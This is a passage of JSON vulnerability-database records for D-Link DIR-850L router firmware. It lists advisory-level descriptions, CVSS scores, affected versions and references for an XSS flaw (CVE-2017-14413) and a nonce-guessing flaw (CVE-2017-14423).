        "db": "CNVD",
        "id": "CNVD-2017-31794"
      }
    ]
  },
  "last_update_date": "2023-12-18T14:05:39.873000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "DIR-850L",
        "trust": 0.8,
        "url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
      },
      {
        "title": "D-Link DIR-850L REV.A Fixes for cross-site scripting vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=235005"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008096"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-580"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-79",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-105135"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008096"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14415"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-14415"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14415"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31794"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105135"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008096"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14415"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-580"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31794"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105135"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008096"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14415"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-580"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31794"
      },
      {
        "date": "2017-09-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105135"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008096"
      },
      {
        "date": "2017-09-13T17:29:00.290000",
        "db": "NVD",
        "id": "CVE-2017-14415"
      },
      {
        "date": "2017-09-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-580"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31794"
      },
      {
        "date": "2017-09-20T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105135"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008096"
      },
      {
        "date": "2023-11-08T20:23:29.577000",
        "db": "NVD",
        "id": "CVE-2017-14415"
      },
      {
        "date": "2023-04-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-580"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-580"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-850L Cross-site scripting vulnerability in device firmware",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008096"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "XSS",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-580"
      }
    ],
    "trust": 0.6
  }
}

VAR-201709-0584

Vulnerability from variot - Updated: 2023-12-18 14:01

D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) devices have XSS in the action parameter to htdocs/web/wpsacts.php. The D-Link DIR-850L device firmware contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. D-Link DIR-850L REV. A is a wireless router from D-Link. A remote attacker could exploit the vulnerability to steal authentication cookies by sending an ‘action’ parameter to the htdocs/web/wandetect.php file


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201709-0584",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "d link",
        "version": "fw114wwb07_h2ab_beta1"
      },
      {
        "model": "dir-850l rev.a \u003c=fw114wwb07 h2ab beta1",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "fw114wwb07_h2ab"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31796"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008094"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14413"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-582"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "fw114wwb07_h2ab",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:fw114wwb07_h2ab:beta1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14413"
      }
    ]
  },
  "cve": "CVE-2017-14413",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 4.3,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2017-14413",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2017-31796",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "VHN-105133",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "exploitabilityScore": 2.8,
            "impactScore": 2.7,
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 6.1,
            "baseSeverity": "Medium",
            "confidentialityImpact": "Low",
            "exploitabilityScore": null,
            "id": "CVE-2017-14413",
            "impactScore": null,
            "integrityImpact": "Low",
            "privilegesRequired": "None",
            "scope": "Changed",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-14413",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-31796",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201709-582",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-105133",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31796"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105133"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008094"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14413"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-582"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) devices have XSS in the action parameter to htdocs/web/wpsacts.php. The D-Link DIR-850L device firmware contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. D-Link DIR-850L REV. A is a wireless router from D-Link. A remote attacker could exploit the vulnerability to steal authentication cookies by sending an ‘action’ parameter to the htdocs/web/wandetect.php file",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14413"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008094"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31796"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105133"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-14413",
        "trust": 3.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008094",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-582",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31796",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-105133",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31796"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105133"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008094"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14413"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-582"
      }
    ]
  },
  "id": "VAR-201709-0584",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31796"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105133"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31796"
      }
    ]
  },
  "last_update_date": "2023-12-18T14:01:29.334000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "DIR-850L",
        "trust": 0.8,
        "url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
      },
      {
        "title": "D-Link DIR-850L REV.A Fixes for cross-site scripting vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=235007"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008094"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-582"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-79",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-105133"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008094"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14413"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-14413"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14413"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31796"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105133"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008094"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14413"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-582"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31796"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105133"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008094"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14413"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-582"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31796"
      },
      {
        "date": "2017-09-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105133"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008094"
      },
      {
        "date": "2017-09-13T17:29:00.197000",
        "db": "NVD",
        "id": "CVE-2017-14413"
      },
      {
        "date": "2017-09-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-582"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31796"
      },
      {
        "date": "2017-09-20T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105133"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008094"
      },
      {
        "date": "2023-11-08T20:20:49.637000",
        "db": "NVD",
        "id": "CVE-2017-14413"
      },
      {
        "date": "2023-04-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-582"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-582"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-850L Cross-site scripting vulnerability in device firmware",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008094"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "XSS",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-582"
      }
    ],
    "trust": 0.6
  }
}

VAR-201709-0594

Vulnerability from variot - Updated: 2023-12-18 13:57

htdocs/parentalcontrols/bind.php on D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) devices does not prevent unauthenticated nonce-guessing attacks, which makes it easier for remote attackers to change the DNS configuration via a series of requests. The D-Link DIR-850L device firmware contains a vulnerability related to security functions. Information may be tampered with. The D-Link DIR-850L REV. A is a wireless router from D-Link. The record below maps the weakness to CWE-307 (improper restriction of excessive authentication attempts), which is consistent with the nonce guessing described here.


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201709-0594",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "d link",
        "version": "fw114wwb07_h2ab_beta1"
      },
      {
        "model": "dir-850l rev.a \u003c=fw114wwb07 h2ab beta1",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "fw114wwb07_h2ab"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31786"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008109"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14423"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-572"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "fw114wwb07_h2ab",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:fw114wwb07_h2ab:beta1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14423"
      }
    ]
  },
  "cve": "CVE-2017-14423",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 5.0,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2017-14423",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
